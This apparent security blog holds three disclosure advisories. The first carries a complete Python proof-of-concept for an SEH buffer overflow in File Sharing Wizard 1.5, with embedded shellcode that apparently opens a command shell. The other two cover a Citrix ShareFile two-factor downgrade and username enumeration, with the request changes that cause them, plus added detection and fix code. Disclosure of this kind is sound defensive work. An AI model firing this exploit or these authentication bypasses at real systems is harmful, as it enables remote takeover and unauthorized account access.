Friday, November 08, 2019

CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET STRUCTURED EXCEPTION HANDLER BASED BUFFER OVERFLOW


Author: Armando Huesca Prida

Summary: 

File Sharing Wizard version 1.5.0 is affected by a Structured Exception Handler (SEH) based buffer overflow vulnerability. An unauthenticated attacker is able to achieve remote command execution and obtain a command shell by sending an HTTP GET request that includes the malicious payload in the URL, an issue similar to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331.

Software Version: File Sharing Wizard version 1.5.0 build 2008 

Tested OS Versions: 
Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601 

Product URL: https://file-sharing-wizard.soft112.com/ 

CVE-ID: CVE-2019-18655 


Details: 

File Sharing Wizard version 1.5.0 build 2008 is affected by a Structured Exception Handler (SEH) based buffer overflow vulnerability. An attacker is able to achieve remote command execution and obtain a command shell by sending an HTTP GET request that includes the malicious payload in the URL, an issue similar to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331.

The following proof-of-concept (PoC) exploit demonstrates this vulnerability.

################### PoC ###################
#!/usr/bin/python
# Python 2 script: str and bytes are the same type here, so the 'A' padding
# and the b"" shellcode buffer can be concatenated directly.
import socket
import os
import sys

# Bad chars: \x00\x20 #
# nSEH value: 0x9090eb08 (nop, nop, JMP short +8 over the handler address) #
# SEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)

seh='\x6d\x57\x37\x7c'    # pop/pop/ret gadget address, little-endian
nseh='\x90\x90\xeb\x08'   # short jump forward over the SEH handler address

buf = b""
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb"
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c"
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19"
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11"
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e"
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a"
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77"
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78"
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4"
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f"
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18"
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b"
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf"
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b"
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b"
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde"

# 1035 bytes of padding reach the nSEH/SEH record; the trailing NOPs pad the
# request to a fixed total length.
poc= 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949-len(buf))
payload='GET //.:/' + poc + ' HTTP/1.0\r\n\r\n'
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.216.135", 80))   # target host, see the Exploit Note below
s.send(payload)
s.close()


Exploit Note: 

This PoC was customized with a specific IP address; to use it on a different local network, set a new target IP address.

Metasploit module: filesharing_wizard_get_bof.rb
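
A defender-side check for the request shape used above, added here and not part of the advisory or its PoC: it parses a raw HTTP request and flags a GET whose URI reaches the 1035-byte SEH offset, starts with the //.:/ prefix from the PoC, or carries a NOP sled or other non-printable bytes. The sample requests are constructed (padding and filler only, no shellcode), not captured traffic.

```python
import re

# Offset taken from the advisory: the nSEH/SEH record is overwritten after
# 1035 bytes of URI data, so any request-URI that long is suspect.
SEH_OFFSET = 1035

REQUEST_LINE = re.compile(rb"^(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/1\.[01]\r?\n")

def analyze_request(raw):
    """Return a dict describing why a raw HTTP request resembles the
    File Sharing Wizard GET overflow, or None when it looks benign."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return {"uri_length": 0, "reasons": ["malformed request line"]}
    uri = m.group("uri")
    reasons = []
    if len(uri) >= SEH_OFFSET:
        reasons.append("uri length %d reaches SEH offset %d" % (len(uri), SEH_OFFSET))
    if uri.startswith(b"//.:/"):
        reasons.append("uri starts with the //.:/ prefix used by the PoC")
    # A NOP sled (run of 0x90) or other non-printable bytes do not belong in a URI.
    nop_run = max((len(r) for r in re.findall(rb"\x90+", uri)), default=0)
    if nop_run >= 8:
        reasons.append("nop sled of %d bytes" % nop_run)
    nonprint = sum(1 for b in uri if b < 0x20 or b > 0x7e)
    if nonprint:
        reasons.append("%d non-printable bytes in uri" % nonprint)
    return {"uri_length": len(uri), "reasons": reasons} if reasons else None

# Constructed sample requests (filler bytes only, not captured traffic):
BENIGN = b"GET /index.html HTTP/1.0\r\n\r\n"
SUSPECT = (b"GET //.:/" + b"A" * 1035 + b"\x90\x90\xeb\x08" + b"\x90" * 10
           + b"B" * 64 + b" HTTP/1.0\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, analyze_request(req))
```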

Credit: 

Discovered by Armando Huesca 

Thursday, May 02, 2019

CVE 2019-7218: CITRIX SHAREFILE TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR


Author: Armando Huesca Prida


Summary:


An attacker with access to the victim's offline OTP generator, a physical token or a virtual app such as Google Authenticator, is able to bypass the first authentication phase (the username/password mechanism) and log in using only a username/OTP combination (phase 2 of 2FA).

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7218

Details:

An attacker with access to the victim's offline OTP generator, a physical token or a virtual app such as Google Authenticator, is able to bypass the first authentication phase (the username/password mechanism) and log in using only a username/OTP combination (phase 2 of 2FA). This way, it is possible to downgrade 2FA to 1FA without knowing the victim's password.

To exploit this vulnerability, an attacker must have access to the offline OTP token (physical or virtual): the attack does not work when the OTP is generated only after phase 1 authentication succeeds and is sent to the client via SMS or phone call.

This vulnerability exists because the server does not check that the client's phase 1 authentication succeeded before validating phase 2 authentication (a flaw in the authentication scheme).

Example:

An attacker can intercept a log-in request sent with garbage credentials and use it as the base for the attack, changing the op and password parameters as follows:

Figure 1 - phase 1 default log-in request and response


Request modifications:

replace op=webflow-auth with op=webflow-verify
replace password=* with code=[OTP]

If the username/OTP combination is correct (phase 2 succeeds), phase 1 authentication is bypassed and the attacker gains unauthorized access to the application, as shown below:

Figure 2 - Evil phase 2 request with modified parameters


The following figure shows proof of unauthorized access to the web application obtained by exploiting this vulnerability.


Figure 3 - Unauthorized access to the application

Advice:

Make sure that the client's phase 1 authentication succeeded before validating phase 2 authentication.

Timeline:

28-01-2019 Vendor disclosure
05-02-2019 Acknowledgement from vendor
02-05-2019 Public Release

Credit:

Discovered by Andrea Pessione and Armando Huesca of SKIT Cyber Security

CVE 2019-7217: CITRIX SHAREFILE USER ENUMERATION

 

Author: Armando Huesca Prida


Summary:

It is possible to enumerate application usernames based on differing server responses to the request that checks the OTP code. No authentication is required.

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7217

Details:

It is possible to enumerate application usernames based on differing server responses to the request that checks the OTP code. No authentication is required.

An example HTTP request follows:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123

Response if username is not correct:


Response if username is correct:
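
The server-side fix from the Advice section of CVE-2019-7218, together with a uniform-response fix for the username enumeration described above, as an added Python model that is not ShareFile's code: vulnerable_verify reproduces the reported behaviour (OTP checked with no phase 1 state, a distinct reply for unknown users) and handle shows the hardened dispatcher. The user table, the session class and the op/parameter handling are assumptions modelled on the parameter names in the two advisories.

```python
from hmac import compare_digest

# Constructed demo data, not real ShareFile accounts or secrets.
USERS = {"alice@example.com": {"password": "correct horse", "otp": "492817"}}
GENERIC_FAILURE = {"error": "invalid username, password or code"}

class AuthSession:
    """Per-session state: phase 1 (webflow-auth) must succeed before
    phase 2 (webflow-verify) may grant access."""
    def __init__(self):
        self.password_ok_for = None   # username that passed phase 1
        self.authenticated = None     # username that completed both phases

def vulnerable_verify(session, params):
    """Models the reported behaviour: the OTP is checked without regard to
    whether phase 1 ever ran, and unknown usernames get a distinct reply."""
    username = params.get("username", "")
    user = USERS.get(username)
    if user is None:
        return {"error": "unknown user"}       # distinct reply enables enumeration
    if compare_digest(user["otp"], params.get("code", "")):
        session.authenticated = username       # password was never checked
        return {"status": "ok"}
    return {"error": "bad code"}

def handle(session, params):
    """Hardened dispatcher: phase 2 only counts after phase 1 succeeded for
    the same username in this session, and every failure reads the same."""
    username = params.get("username", "")
    user = USERS.get(username)
    op = params.get("op")
    if op == "webflow-auth":
        if user and compare_digest(user["password"], params.get("password", "")):
            session.password_ok_for = username
            return {"status": "otp_required"}
        return GENERIC_FAILURE
    if op == "webflow-verify":
        # Reject unless this session already passed phase 1 for this user.
        if user is None or session.password_ok_for != username:
            return GENERIC_FAILURE
        if compare_digest(user["otp"], params.get("code", "")):
            session.password_ok_for = None
            session.authenticated = username
            return {"status": "ok"}
        return GENERIC_FAILURE
    return GENERIC_FAILURE
```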


Timeline:

22-01-2019 Vendor disclosure
05-02-2019 Acknowledgement from vendor
02-05-2019 Public Release


Credit:

Discovered by Armando Huesca and Andrea Pessione of SKIT Cyber Security